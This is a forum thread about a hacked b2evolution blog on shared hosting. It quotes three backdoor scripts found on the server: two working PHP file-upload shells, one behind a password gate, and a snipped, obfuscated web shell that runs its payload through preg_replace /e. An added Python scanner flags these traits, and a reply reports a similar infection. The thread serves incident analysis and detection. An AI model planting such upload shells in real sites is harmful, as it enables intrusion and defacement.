I became aware of the fact that if one goes to mysite.com/doc - a pharmacy site page opens. Mysite.com is powered by b2evolution 4.1.7 (was 4.0.5 prior to the hack).
The /doc directory contains some CSS and HTML files. The question is, how did they get there?
Here are some relevant details:
- I'm using shared hosting on Bluehost
- After discovering the `doc` directory, I changed its permissions to 000 and shortly after that, another directory showed up - `doc3`, containing the same pharma store
- Upon discovering that, I thought it is an unpatched problem in 4.0.5, so I upgraded to 4.1.7 - but in a few hours, the pharma site was back
- I compared the directories of my freshly upgraded 4.1.7 with the one that is hacked and there are no differences in the files, nor are there new files, except: images in the /media directory, the `doc` directory itself, and the plugins I installed: akismet, recaptcha, google_analytics
- When I was upgrading to 4.1.7, the install URL had an unusual thing in it: `mysite.com/install/index.php?dasya=true`. I didn't really pay attention to that, but I remember it wasn't there in earlier versions (and I've been using b2evo since 1.x days). It seems to be some form of malware, because there are a few other hits about it online - but nothing substantial, just people asking about what it is; no solutions or explanations so far.
While examining the previous snapshot of the hacked 4.0.5, I discovered:
- ext.php in the root directory, which was a file uploading interface - the files would go straight to the root directory
- a hidden file called `.thumbs_up.php` in the `/media/blogs/a` directory (where my images go)
- a file called `readmed.php` in the google_analytics_plugin
There are multiple domains hosted on the same Bluehost account, and only one of them gets compromised (even though another one is also running b2evolution (v 3.3.3) in a different subdirectory).
Perhaps there is a server-side problem, not related to b2evo itself; but then... why are other directories not affected? At this point I have quite a lot of different clues, but nothing to glue them together yet. Any help will be greatly appreciated.
body of ext.php (prettified, originally it was a single line thing)
<?php
error_reporting(0);
@ini_set("display_errors", 0);
$var = $_SERVER['PHP_SELF'] . "?";
$form = '<form enctype="multipart/form-data" action="' . $var . '" method="POST"><input name="uploadFile" type="file"/><br/><input type="submit" value="Upload" /></form>';
if (!empty($_FILES['uploadFile']))
{
$self = dirname(__FILE__);
move_uploaded_file($_FILES["uploadFile"]["tmp_name"], $self . DIRECTORY_SEPARATOR . $_FILES["uploadFile"]["name"]);
$time = filemtime($self);
print "OK";
}
else
{
print $form;
} ?>
body of .thumbs_up.php
<?php
$auth_pass = "8a4bf282852bf4c49e17f0951f645e72";
$color = "#df5";
$default_action = "FilesMan";
$default_charset = "Windows-1251";
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x6
...
<snip>
...
Lq9x9Gt4uJYexm3ORT3UDtmLVhx5X4qm/OcBsLu8rUirk72Onl5tBjNRCty4s8Uh1VQKxLg+xQC0T93+IV4sxw/c08okR1wKtoyadLX6Dl6tDg3WxVxFoHhkj6Yn/xc='\x29\x29\x29\x3B",".");
?>
body of readmed.php
<?php error_reporting(0);
@ini_set("display_errors", 0);
$var= $_SERVER['PHP_SELF']."?".$_SERVER['QUERY_STRING'];
$md5RandomPass = "6c11824f3cbe6d65396edd61c0d27c47";
$form =<<<HTML
<form enctype="multipart/form-data" action="$var" method="POST">
<input name="uploadFile" type="file"/><br/>
<input type="submit" value="Upload" />
</form>
HTML;
if (md5($_REQUEST['pass']) != $md5RandomPass) {
exit();
}
if (!empty($_FILES['uploadFile'])) {
$self = dirname(__FILE__);
move_uploaded_file($_FILES["uploadFile"]["tmp_name"], $self.DIRECTORY_SEPARATOR.$_FILES["uploadFile"]["name"]);
$time = filemtime($self );
touch($self.DIRECTORY_SEPARATOR.$_FILES["uploadFile"]["name"], $time);
print "OK";
} else {
print $form;
} ?>
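Added example, not part of the original post or of b2evolution: a small Python scanner that walks a document root and flags PHP files showing the traits visible in the three scripts above (a hidden dot-file under the media directory, preg_replace with the /e eval modifier, a long run of \x-escaped code, a move_uploaded_file handler, an md5 password gate, and silenced error reporting). The regexes, the indicator names and the sample files written by demo() are constructed for this example; the sample paths merely mirror the locations named in the post.

```python
import os
import re
import tempfile

# Indicators drawn from the three scripts quoted in the post above; the
# regexes and the sample files in demo() are constructed for this example.
INDICATORS = {
    # "/.*/e": the deprecated eval modifier, used in .thumbs_up.php to run a hidden payload
    "preg_replace_e": re.compile(r'preg_replace\s*\(\s*["\'](.)[^"\']*\1[a-zA-Z]*e[a-zA-Z]*["\']'),
    "hex_escaped_code": re.compile(r'(?:\\x[0-9a-fA-F]{2}){6,}'),   # eval/gzinflate spelled as \x escapes
    "file_upload_handler": re.compile(r'move_uploaded_file\s*\('),
    "md5_password_gate": re.compile(r'md5\s*\(\s*\$_(?:REQUEST|POST|GET)\s*\['),
    "errors_suppressed": re.compile(r'error_reporting\s*\(\s*0\s*\)'),
}

def scan_source(src, filename=""):
    """Return the indicator names found in one PHP source string, in INDICATORS order."""
    found = ["hidden_php_file"] if os.path.basename(filename).startswith(".") else []
    found += [name for name, rx in INDICATORS.items() if rx.search(src)]
    return found

def scan_tree(root):
    """Map each flagged .php file under root (posix-style relative path) to its indicators."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                found = scan_source(fh.read(), path)
            if found:
                hits[os.path.relpath(path, root).replace(os.sep, "/")] = found
    return hits

def demo():
    """Write constructed stand-ins for the posted scripts into a temp docroot and scan it."""
    samples = {
        "ext.php": '<?php error_reporting(0); move_uploaded_file($_FILES["f"]["tmp_name"], "x");',
        "media/blogs/a/.thumbs_up.php": '<?php preg_replace("/.*/e", "\\x65\\x76\\x61\\x6C\\x28\\x67\\x7A(...)", ".");',
        "plugins/google_analytics_plugin/readmed.php": '<?php if (md5($_REQUEST["pass"]) != "x") exit(); move_uploaded_file($_FILES["u"]["tmp_name"], "y");',
        "index.php": '<?php echo "hello"; ?>',
    }
    root = tempfile.mkdtemp()
    for rel, body in samples.items():
        os.makedirs(os.path.dirname(os.path.join(root, rel)), exist_ok=True)
        with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
            fh.write(body)
    return scan_tree(root)
```

Point scan_tree() at a real docroot to get a list of files worth comparing against a clean copy of the same b2evolution release; a clean index.php produces no entry, while each of the three posted scripts is flagged by more than one indicator.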
I wish I could answer how they got there because I had a similar issue within the past week with my host, Netfirms.
A non-active but still online version of 1.9.3 was suddenly found to have been compromised with a couple of rogue PHP scripts:
Another active site running B2 5.06 was also somehow infected with .Thumbs_up.
I deleted the files and a couple of unused FTP accounts and have not had trouble since (knock wood). Makes me wonder if someone left a backdoor open somewhere.